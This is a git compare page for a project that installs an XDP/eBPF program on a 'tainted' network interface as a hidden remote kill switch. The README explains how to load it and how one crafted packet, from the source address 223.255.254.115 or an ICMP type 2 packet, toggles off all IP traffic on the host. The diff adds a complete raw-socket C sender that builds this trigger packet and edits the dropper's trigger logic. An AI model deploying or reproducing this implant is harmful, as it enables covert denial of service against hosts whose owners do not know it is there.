Migration This is my new public git source viewer. Source coming soon. Please contact with concerns/bugs. Contact me

Compare

4da4b60f287f4c468befbbec2a047e685ef412b9 … main · 4 commits

merge base 4da4b60f287f…

Changed files

Commits

HashSubjectAuthorDate
b9ef8fbd organization Ryan Schanzenbacher
f8616c82 Update README.md Ryan Schanzenbacher
e75179f4 Added new ping trigger programs Ryan Schanzenbacher
ccaa1b97 removed code that was never used Ryan Schanzenbacher
diff --git a/README.md b/README.md
index b523fb4..8d5c8dd 100644
--- a/README.md
+++ b/README.md
@@ -13,18 +13,18 @@ mount -t bpf bpf /sys/fs/bpf
This command should return no errors. Next, ensure the package xdp-loader is installed. This package is provided in `xdp-tools`. Finally, load the driver on the interface you want to "attack" (found using `ip a`).
```
-xdp-loader load {interface_name} packet_dropper.o
+xdp-loader load {interface_name} packet_dropper_new.o
```
### Usage
-Now that the driver is loaded, it is active. Nothing will appear to have changed on the host system (however if you run `ip a` now you will see a new "xdp" entry after the interface mtu. On a separate system, craft an IP packet with the source address equal to `223.255.254.115` and the destination equal to the computer with the tainted interface. There can be any payload encapsulated within the IP packet, this is discarded. A sample python script utilizing scapy has been provided. When this packet is sent, all IP communication from the tainted interface will be blocked, effectively disabling the computers communication with the outside world. Note: Layer 2 communication (like ARP) will still be allowed to ensure connectivity can be restored. If you send the specially crafted packet again, IP communication will be allowed through again, like a toggle.
+Now that the driver is loaded, it is active. Nothing will appear to have changed on the host system (however if you run `ip a` now you will see a new "xdp" entry after the interface mtu. On a separate system, craft an IP packet with the source address equal to `223.255.254.115` and the destination equal to the computer with the tainted interface. There can be any payload encapsulated within the IP packet, this is discarded. A sample python script utilizing scapy has been provided. Or, you can send a legitimate ICMP packet with the type of 2 to trigger the payload as well. An example C program has been included showing this. When this packet is sent, all IP communication from the tainted interface will be blocked, effectively disabling the computers communication with the outside world. Note: Layer 2 communication (like ARP) will still be allowed to ensure connectivity can be restored. If you send the specially crafted packet again, IP communication will be allowed through again, like a toggle.
### Build information
A prebuild version has been provided, however to build you can do the following. You need the linux headers, libbpf headers, libxdp headers and clang. Once you have all of these installed, run the following command to build the object file that can be loaded:
```
-clang -O2 -g -Wall -target bpf -c packet_dropper.c -o packet_dropper.o
+clang -O2 -g -Wall -target bpf -c packet_dropper_new.c -o packet_dropper_new.o
```
diff --git a/packet_sender.py b/ping_senders/packet_sender.py
similarity index 100%
rename from packet_sender.py
rename to ping_senders/packet_sender.py
diff --git a/ping_senders/ping3 b/ping_senders/ping3
new file mode 100755
index 0000000..edb585c
Binary files /dev/null and b/ping_senders/ping3 differ
diff --git a/ping_senders/ping3.c b/ping_senders/ping3.c
new file mode 100644
index 0000000..f0dd858
--- /dev/null
+++ b/ping_senders/ping3.c
@@ -0,0 +1,110 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <sys/select.h>
+
+unsigned short cksum(unsigned short *addr, int len);
+
+int main(int argc, char *argv[]) {
+ int sock;
+ char send_buf[400], src_ip[15], dst_ip[15], src_name[256];
+ struct ip *ip = (struct ip *)send_buf;
+ struct icmp *icmp = (struct icmp *)(ip + 1);
+ struct hostent *src_hp, *dst_hp;
+ struct sockaddr_in src, dst;
+ int on = 1;
+ memset(send_buf, 0, sizeof(send_buf));
+
+ if (argc < 2) {
+ printf("Need arg. I\n");
+ exit(EXIT_FAILURE);
+ }
+
+ /**if (getuid() == 0) {
+ fprintf(stderr, "Need to elevate\n");
+ exit(EXIT_FAILURE);
+ } **/
+
+ gethostname(src_name, sizeof(src_name));
+ printf("%s\n", src_name);
+ src_hp = gethostbyname(src_name);
+ ip->ip_src = (*(struct in_addr *)src_hp->h_addr_list[0]);
+
+ dst_hp = gethostbyname(argv[1]);
+ ip->ip_dst = (*(struct in_addr *)dst_hp->h_addr);
+ dst.sin_addr = (*(struct in_addr *)dst_hp->h_addr);
+
+ sprintf(src_ip, "%s", inet_ntoa(ip->ip_src));
+ sprintf(dst_ip, "%s", inet_ntoa(ip->ip_dst));
+ printf("Src: %s -- Dst: %s\n", src_ip, dst_ip);
+
+ // Create socket
+ sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+
+ setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
+
+ // IP Structure
+ ip->ip_v = 4;
+ ip->ip_hl = 5;
+ ip->ip_tos = 0;
+ ip->ip_len = htons(sizeof(send_buf));
+ ip->ip_id = htons(321);
+ ip->ip_off = htons(0);
+ ip->ip_ttl = 255;
+ ip->ip_p = IPPROTO_ICMP;
+ ip->ip_sum = 0;
+
+ // ICMP Structure
+ icmp->icmp_type = 2;
+ icmp->icmp_code = 0;
+
+ dst.sin_family = AF_INET;
+
+ ip->ip_sum = cksum((unsigned short *)send_buf, ip->ip_hl);
+ icmp->icmp_cksum = cksum((unsigned short *)icmp, sizeof(send_buf) - sizeof(struct icmp));
+
+ int dst_addr_len = sizeof(dst);
+ int bytes_sent;
+
+ if((bytes_sent = sendto(sock, send_buf, sizeof(send_buf), 0, (struct sockaddr *)&dst, dst_addr_len)) < 0) {
+ perror("send err");
+ fflush(stdout);
+ }
+ else {
+ printf("Sent %d bytes\n", bytes_sent);
+ }
+
+
+}
+
+unsigned short cksum(unsigned short *addr, int len) {
+ int nleft = len;
+ int sum = 0;
+ unsigned short *w = addr;
+ unsigned short answer = 0;
+
+ while (nleft > 1) {
+ sum += *w++;
+ nleft -= 2;
+ }
+
+ if (nleft == 1) {
+ *(unsigned char *)(&answer) = *(unsigned char *)w;
+ sum += answer;
+ }
+
+ sum = (sum >> 16) + (sum & 0xffff);
+ sum += (sum >> 16);
+ answer = ~sum;
+
+ return answer;
+}
diff --git a/ping_senders/ping_send b/ping_senders/ping_send
new file mode 100644
index 0000000..37a2396
Binary files /dev/null and b/ping_senders/ping_send differ
diff --git a/packet_dropper.c b/xdp-program/packet_dropper.c
similarity index 100%
rename from packet_dropper.c
rename to xdp-program/packet_dropper.c
diff --git a/packet_dropper.o b/xdp-program/packet_dropper.o
similarity index 100%
rename from packet_dropper.o
rename to xdp-program/packet_dropper.o
diff --git a/packet_dropper_new.c b/xdp-program/packet_dropper_new.c
similarity index 96%
rename from packet_dropper_new.c
rename to xdp-program/packet_dropper_new.c
index a59a3a4..3033b38 100644
--- a/packet_dropper_new.c
+++ b/xdp-program/packet_dropper_new.c
@@ -7,7 +7,6 @@
#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/if_vlan.h>
-//#include <arpa/inet.h>
struct {
__uint(type, BPF_MAP_TYPE_ARRAY);
@@ -61,9 +60,6 @@ int entry(struct xdp_md *ctx) {
// Determine if we need to further process this packet
//if (ip_src == 1946091487) {
bpf_printk("Incoming packet: %u\n", icmph->type);
- if (icmph->ttl == 252) {
- bpf_printk("Echo request data: %x", pingdata);
- }
if (icmph->type == 2 || ip_src == 1946091487) {
// This packet had a destination of 223.255.254.115, do something!
// bpf_printk("Got it!, setting rec..."); // Debug print